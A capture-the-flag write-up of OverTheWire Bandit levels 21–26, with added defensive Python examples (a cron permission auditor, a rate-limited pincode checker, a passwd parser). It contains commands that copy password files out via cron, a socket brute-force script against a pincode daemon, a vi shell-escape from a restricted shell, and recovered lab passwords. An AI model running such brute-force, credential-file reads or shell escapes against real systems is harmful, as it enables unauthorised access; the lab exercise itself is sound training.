
Bandit 21 ~ 30

bandit21

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit21@bandit:/etc/cron.d$ ls
cronjob_bandit15_root  cronjob_bandit17_root  cronjob_bandit22  cronjob_bandit23 
cronjob_bandit24  cronjob_bandit25_root

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

bandit22

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
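Added example (not code from the post or from OverTheWire): a small Python audit of /etc/cron.d entries of the kind shown in these two levels. It parses the schedule, user and command fields of each line, reproduces the /tmp target name that cronjob_bandit23.sh derives with md5sum (echo appends a newline, and md5sum hashes it too), and flags jobs whose script can be modified by someone other than root or the user the job runs as. The two cronjob_bandit22 lines are the ones from the transcript; the dropper.sh line and the whole ownership table are constructed sample data standing in for stat().

```python
#!/usr/bin/env python3
"""Added example: parse /etc/cron.d entries, reproduce the md5sum-derived
/tmp target used by cronjob_bandit23.sh, and flag jobs whose script another
user can modify. Sample entries and the ownership table are constructed."""
import hashlib
import stat
from dataclasses import dataclass

# crontab shorthands that replace the five time fields
SPECIAL_SCHEDULES = {"@reboot", "@yearly", "@annually", "@monthly",
                     "@weekly", "@daily", "@midnight", "@hourly"}


@dataclass
class CronJob:
    schedule: str
    user: str       # /etc/cron.d lines carry a user field; per-user crontabs do not
    command: str


def parse_cron_d(text):
    """Jobs in one /etc/cron.d file; comments and VAR=value lines are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if "=" in parts[0]:                      # SHELL=/bin/sh, PATH=..., MAILTO=...
            continue
        if parts[0] in SPECIAL_SCHEDULES:
            schedule, rest = parts[0], parts[1:]
        else:
            schedule, rest = " ".join(parts[:5]), parts[5:]
        jobs.append(CronJob(schedule, rest[0], " ".join(rest[1:])))
    return jobs


def script_path(job):
    """The program cron actually executes: the first token of the command."""
    return job.command.split()[0]


def spool_target(username):
    """Same derivation as cronjob_bandit23.sh:  echo "I am user $name" | md5sum.
    echo appends a newline, and md5sum hashes that newline too."""
    return hashlib.md5(f"I am user {username}\n".encode()).hexdigest()


def is_risky(job, ownership):
    """A job is risky when its script can be changed by someone other than root
    or the job's own user: group/world write bits, or a third-party owner.
    `ownership` maps path -> (owner, mode) and stands in for stat() here."""
    path = script_path(job)
    if path not in ownership:
        return False
    owner, mode = ownership[path]
    others_can_write = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    third_party_owner = owner not in ("root", job.user)
    return others_can_write or third_party_owner


def audit(text, ownership):
    """Paths of scripts that fail the ownership/permission check."""
    return [script_path(j) for j in parse_cron_d(text) if is_risky(j, ownership)]


# Constructed sample: the two lines from cronjob_bandit22 plus an invented bad one.
SAMPLE_CRON_D = """\
# run bandit22's job at boot and every minute
SHELL=/bin/sh
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
*/5 * * * * bandit24 /tmp/dropper.sh &> /dev/null
"""
SAMPLE_OWNERSHIP = {                                   # constructed, not from the host
    "/usr/bin/cronjob_bandit22.sh": ("root", 0o755),   # root-owned, only root can write
    "/tmp/dropper.sh": ("bandit23", 0o777),            # owned by another user, world-writable
}

if __name__ == "__main__":
    for job in parse_cron_d(SAMPLE_CRON_D):
        print(f"{job.schedule:12} {job.user:9} {script_path(job)}")
    print("bandit23 spool target:", spool_target("bandit23"))
    print("risky:", audit(SAMPLE_CRON_D, SAMPLE_OWNERSHIP))
```

The check encodes the privilege boundary cron enforces: every line runs as the named user, so any file on the command's path that a different, less privileged user can write is that user's way into the job's privileges. On a real host the ownership table would come from os.stat() on each script path.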

bandit23 (looked at the solution)

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. 
This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, 
        so you may want to keep a copy around…
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
bandit23@bandit:/tmp/level23$ vi level23.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/level23/flag

bandit23@bandit:/tmp/level23$ chmod 777 level23.sh
bandit23@bandit:/tmp/level23$ cp level23.sh /var/spool/bandit24

I tried to do it this way, but only bandit23 has permissions on the level23 directory, so the file could not be created.

bandit23@bandit:/var/spool/bandit24$ vi a.sh
bandit23@bandit:/var/spool/bandit24$ chmod 777 a.sh
bandit23@bandit:/var/spool/bandit24$ ls -al flag
ls: cannot access 'flag': No such file or directory
bandit23@bandit:/var/spool/bandit24$ ls -al flag
-rw-r--r-- 1 bandit24 bandit24 33 Jul 13 13:13 flag
bandit23@bandit:/var/spool/bandit24$ cat flag
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

bandit24 (referred to a solution)

A daemon is listening on port 30002 and will give you the password for bandit25 
if given the password for bandit24 and a secret numeric 4-digit pincode. 
There is no way to retrieve the pincode 
except by going through all of the 10000 combinations, called brute-forcing.

This can be solved with socket programming.
Socket coding in Python:

bandit24@bandit:~$ telnet localhost 30002
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
Wrong! Please enter the correct pincode. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5562
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
Connection closed by foreign host.
#!/usr/bin/env python3
#coding: utf-8

import socket
import sys

host = 'localhost'
port = 30002

# Keep the module and the connection under different names: rebinding the name
# "socket" to the connection object only worked because the right-hand side is
# evaluated first, and it makes socket.* unusable afterwards.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
start_msg = sock.recv(1024)   # the daemon's banner

print(start_msg)
pwd = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for a in range(0, 10):
    for b in range(0, 10):
        for c in range(0, 10):
            for d in range(0, 10):
                pincode = str(a) + str(b) + str(c) + str(d) + '\n'
                msg = pwd + ' ' + pincode          # "<password> <pincode>\n"
                sock.sendall(msg.encode('utf-8'))
                recv = sock.recv(1024)
                recv_msg = recv.decode('utf-8')
                if "Wrong!" not in recv_msg:       # anything but "Wrong!" is the answer
                    print(recv_msg)
                    sock.close()
                    sys.exit(1)
                else:
                    print("False", pincode)
bandit24@bandit:/tmp/lv24$ python3 brute.py
b'I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.\n'
False 0000

False 0001

False 0002

[redacted]

False 2586

False 2587
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
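Added example (not code from the post, and not the real daemon): an in-memory model of the port-30002 pincode checker, written from the service side to show why the loop above gets through all 10000 combinations unhindered and what a per-connection attempt limit changes. The password, pincode, next password, attempt limit and the "Too many attempts" message are constructed values; the "Wrong!" and "Correct!" replies are the ones seen in the transcript.

```python
#!/usr/bin/env python3
"""Added example: an in-memory model of the port-30002 pincode checker that
shows why the brute force above works and what an attempt limit changes.
Password, pincode and attempt limit are constructed values, not the real ones."""
import hmac
from itertools import product

WRONG = "Wrong! Please enter the correct pincode. Try again."
LOCKED = "Too many attempts. Exiting."        # constructed; the real daemon only times out


class PincodeChecker:
    """State for one client connection. Without `max_attempts` it behaves like
    the daemon in the transcript: every guess is answered, the client just iterates."""

    def __init__(self, password, pincode, next_password, max_attempts=None):
        self._password = password.encode()
        self._pincode = pincode.encode()
        self._next_password = next_password
        self.max_attempts = max_attempts
        self.attempts = 0
        self.locked = False

    def handle_line(self, line):
        """One request line "<password> <pincode>" -> the reply text."""
        if self.locked:
            return LOCKED
        parts = line.strip().split(" ")
        if len(parts) != 2:
            return WRONG
        self.attempts += 1
        password, pincode = (p.encode() for p in parts)
        # constant-time comparison of both parts, combined with & rather than
        # `and` so the pincode check runs even when the password is wrong
        ok = hmac.compare_digest(password, self._password) & hmac.compare_digest(pincode, self._pincode)
        if ok:
            return f"Correct!\nThe password of user bandit25 is {self._next_password}"
        if self.max_attempts is not None and self.attempts >= self.max_attempts:
            self.locked = True
            return LOCKED
        return WRONG


def guesses_until_found(checker, password):
    """Send pincodes 0000..9999 in order, as the script above does. Returns the
    number of lines sent before Correct!, or None if the checker locked first."""
    for n, digits in enumerate(product("0123456789", repeat=4), start=1):
        reply = checker.handle_line(f"{password} {''.join(digits)}")
        if reply.startswith("Correct!"):
            return n
        if checker.locked:
            return None
    return None


if __name__ == "__main__":
    # constructed credentials
    open_checker = PincodeChecker("pw-bandit24", "2587", "pw-bandit25")
    print("no limit:", guesses_until_found(open_checker, "pw-bandit24"))
    limited = PincodeChecker("pw-bandit24", "2587", "pw-bandit25", max_attempts=5)
    print("limit 5:", guesses_until_found(limited, "pw-bandit24"), "after", limited.attempts, "tries")
```

With no limit the model answers all 2588 lines it takes to reach 2587; with a limit of five it stops answering after the fifth wrong guess. A per-connection counter is only the first layer a real service needs, since it resets on reconnect; a per-account or per-source limit and logging of the failed attempts are what make the 10000-guess search visible and impractical.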

bandit25 (looked at the solution)

Logging in to bandit26 from bandit25 should be fairly easy… 
The shell for user bandit26 is not /bin/bash, but something else. 
Find out what it is, how it works and how to break out of it.

The shell can be checked in the following ways.

1. grep <user> /etc/passwd -> check the user's login shell
2. echo $SHELL -> check the shell currently in use
3. cat /etc/shells -> check the shells available on the system
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

The fields of /etc/passwd mean the following.
Reference: https://webdir.tistory.com/129

root:x:0:0:root:/root:/bin/bash
 1   2 3 4  5     6       7         

Field 1: username

Field 2: password (stored encrypted in /etc/shadow)

Field 3: user account UID

Field 4: user account GID

Field 5: user account name (comment/info)

Field 6: user account home directory

Field 7: user account login shell
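Added example (not code from the post): a Python parser for the seven colon-separated fields described above, plus the check that makes an account like bandit26 stand out: its login shell is not one of the shells registered in /etc/shells. The bandit26 line is the one from the grep output; the other passwd lines and the /etc/shells contents are constructed sample data.

```python
#!/usr/bin/env python3
"""Added example: parse the seven fields of /etc/passwd and list accounts whose
login shell is not registered in /etc/shells. The bandit26 line is from the
post; the other sample lines and the shells list are constructed."""
from dataclasses import dataclass


@dataclass
class PasswdEntry:
    name: str
    password: str   # 'x' means the hash is kept in /etc/shadow
    uid: int
    gid: int
    gecos: str      # field 5: account name / comment
    home: str
    shell: str


def parse_passwd_line(line):
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        raise ValueError(f"expected 7 fields, got {len(parts)}: {line!r}")
    name, password, uid, gid, gecos, home, shell = parts
    return PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell)


def parse_passwd(text):
    return [parse_passwd_line(line) for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def parse_shells(text):
    """/etc/shells: one absolute path per line; '#' starts a comment."""
    return {line.strip() for line in text.splitlines()
            if line.strip() and not line.startswith("#")}


NO_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def unregistered_shells(passwd_text, shells_text):
    """name -> shell for accounts whose shell is neither in /etc/shells nor a
    conventional no-login shell. These are the ones worth a closer look."""
    shells = parse_shells(shells_text)
    return {e.name: e.shell for e in parse_passwd(passwd_text)
            if e.shell not in shells and e.shell not in NO_LOGIN_SHELLS}


def login_shell_of(passwd_text, username):
    """Like `grep <user> /etc/passwd`, but matching the name field exactly
    (grep would also match bandit260, or a GECOS field containing the name)."""
    for e in parse_passwd(passwd_text):
        if e.name == username:
            return e.shell
    return None


SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bandit25:x:11025:11025:bandit level 25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
"""
SAMPLE_SHELLS = """\
# /etc/shells: valid login shells (constructed)
/bin/sh
/bin/bash
/usr/bin/bash
"""

if __name__ == "__main__":
    print("bandit26 shell:", login_shell_of(SAMPLE_PASSWD, "bandit26"))
    print("not in /etc/shells:", unregistered_shells(SAMPLE_PASSWD, SAMPLE_SHELLS))
```

A shell outside /etc/shells is not a bug by itself (chsh simply refuses to select it), but it is the signal that the account gets a custom program instead of an interactive shell, which is the case to read before logging in.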
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux  

more ~/text.txt    
exit 0

more is a command that reads the contents of a file and prints it one screen at a time.
The screen would not shrink any further than in Hyperputty, so I zoomed in to make the screen smaller.
When more comes up, press v to enter vi, then :e /etc/bandit_pass/bandit26 prints the flag.

bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
:e /etc/bandit_pass/bandit26
1 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

bandit26

Good job getting a shell! 
Now hurry and grab the password for bandit27!
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
:set shell=/usr/bin/bash
enter
!/bin/bash
bandit26@bandit:~$ ls
bandit27-do  text.txt
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.  
Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
This post is licensed under CC BY 4.0 by the author.